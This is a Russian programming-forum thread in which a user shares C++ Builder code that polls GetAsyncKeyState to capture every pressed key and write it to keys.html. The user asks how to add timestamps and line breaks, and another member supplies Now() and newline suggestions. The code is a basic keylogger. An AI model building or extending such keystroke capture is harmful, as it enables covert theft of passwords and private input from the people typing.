Форум программистов, компьютерный форум CyberForum.ru
Наши страницы

С++ для начинающих

Войти
Регистрация
Восстановить пароль
 
Рейтинг: Рейтинг темы: голосов - 11, средняя оценка - 5.00
Grex
1 / 1 / 0
Регистрация: 03.12.2008
Сообщений: 55
#1

Запись системного времени в файл. - C++

28.06.2011, 15:40. Просмотров 1594. Ответов 6
Метки нет (Все метки)

Добрый день гуру!
Есть программка недоработанная.
Перехватывает все нажатые клавиши и пишет их в файл.
Но все символы идут сплошным текстом.
Хочу вставить системное время, потом перехваченные клавиши и сброс на новую строку.
Пример:
"дата, время" - "перехваченные клавиши"
......
2.12.2011, 01:57 - "перехваченные клавиши"
2.12.2011, 01:58 - "перехваченные клавиши"
2.12.2011, 01:59 - "перехваченные клавиши"
2.12.2011, 02:00 - "перехваченные клавиши"
2.12.2011, 02:01 - "перехваченные клавиши"
......
Вот код записи в файл, перехваченных клавиш.
Как сюда можно вставить системное время и дату, подскажите пожалуйста.
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
{
index=1;
while (index<256)
{
result=GetAsyncKeyState(index);
Application->ProcessMessages();
if (result!=0) {
             IsSystemKey(index);
             if (KEY!="") Memo1->Lines->Add(KEY);
             else Memo1->Lines->Add((char)index);
             Memo1->Lines->SaveToFile("keys.html");
             while (result!=0)
             {
             result=GetAsyncKeyState(index);
             }
             index=1;
}
index++;
}
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
28.06.2011, 15:40
Здравствуйте! Я подобрал для вас темы с ответами на вопрос Запись системного времени в файл. (C++):

Запись системного времени в файл - C++
Добрый вечер! Тут такая проблема возникла... Зписываю системное время в файл, но через fprintf(f, &quot;%ver:\n&quot;, version); переменная...

Запись времени отсортированного массива в файл - C++
Не получается записать время сортировок,выбираю размер и кол-во повторов сортировки и выбивает ошибку Есть ли какой-нибудь другой вариант...

Вывод системного времени - C++
нужна помощь в такой задаче. Задание выполняется в двух вариантах: под Linux и Windows. Необходимо разработать консольное приложение, в...

Определение системного времени - C++
Здравствуйте! Я начинающий программист и сейчас занимаюсь созданием новой программы. Требуется найти время в системе (windows) и записать в...

Вывод системного времени - C++
Приветствую, уважаемые пользователи cyberforum! Хотелось бы узнать как выводить дату через cout struct tm timeinfo; time_t...

Перевод системного времени - C++
Задача отловить изменение системного времени time1=time(NULL); Sleep(delay); time2=time(NULL); if(time1!=time2-delay) ...

6
xAtom
915 / 740 / 60
Регистрация: 09.12.2010
Сообщений: 1,346
Записей в блоге: 1
28.06.2011, 15:58 #2
Now(); - возвращает дату и время в строке ты ведь в Borland-e
1
Grex
1 / 1 / 0
Регистрация: 03.12.2008
Сообщений: 55
28.06.2011, 16:15  [ТС] #3
Цитата Сообщение от xAtom Посмотреть сообщение
Now(); - возвращает дату и время в строке ты ведь в Borland-e
Да делаю в c++ builder (RAD), через форму.
Но проблема не в самой функции..., а в том, как вставить её в код, чтобы время и дата записывались с новой строки, а после них перехваченные клавиши.
0
xAtom
915 / 740 / 60
Регистрация: 09.12.2010
Сообщений: 1,346
Записей в блоге: 1
28.06.2011, 16:24 #4
Вот держи.
C++
1
Memo1->Lines->Add("'" + Now() + "', " + IntToStr((char)'A'));
1
Grex
1 / 1 / 0
Регистрация: 03.12.2008
Сообщений: 55
28.06.2011, 22:53  [ТС] #5
Тобишь это получается так?
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
index=1;
while (index<256)
{
result=GetAsyncKeyState(index);
Application->ProcessMessages();
if (result!=0) {
             IsSystemKey(index);
             if (KEY!="") Memo1->Lines->Add(KEY);
             else Memo1->Lines->Add((char)index);
                         Memo1->Lines->Add("'" + Now() + "', " + IntToStr((char)'A'));
             Memo1->Lines->SaveToFile("keys.html");
             while (result!=0)
             {
             result=GetAsyncKeyState(index);
             }
             index=1;
}
index++;
}
Добавлено через 4 часа 33 минуты
Атом, большое тебе спасибо, все отлично работает, только пишет все в кучу - сплошным текстом.
Может ты знаешь как сделать перенос на новую строку каждую секунду?
Буду тебе очень благодарен!

Добавлено через 1 час 29 минут
в TXT файле он и так пишет все с новой строки, а вот в HTML все сплошным текстом
0
xAtom
915 / 740 / 60
Регистрация: 09.12.2010
Сообщений: 1,346
Записей в блоге: 1
28.06.2011, 22:56 #6
C++
1
2
Memo1->Lines->Add("'" + Now() + "', " + IntToStr((char)'A') + '\r');  
// если не поможет то '\n',  если ещё не поможет "\r\n"
1
Grex
1 / 1 / 0
Регистрация: 03.12.2008
Сообщений: 55
28.06.2011, 23:03  [ТС] #7
нее, ни один из 3 вариантов не подошел )).
Больше ничего из системных функций нету?
0
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
28.06.2011, 23:03
Привет! Вот еще темы с ответами:

функция вывода системного времени - C++
Всем привет! Необходимо написать функцию вывода текущего системного времени Вот слепил, а не работает: void InitTime(Time&amp; time) ...

От системного времени отнять введённое - C++
Необходимо от системного времени отнять введённое. Например: выводит системное, к примеру сейчас 22:46,после ввожу я: 18:24 и должен...

Вывод системного времени на экран - C++
Нужно создать клас в котором будет информация про системное время.Также нужно создать метод который будет эту инфу выводить.... задачу...

Затруднения с выводом системного времени в программе - C++
Здравствуйте! Подскажите пожалуйста, как исправить ошибку. У меня две формы. Первая - примитивная авторизация по ключу, вторая...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
7
Yandex
Объявления
28.06.2011, 23:03
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Рейтинг@Mail.ru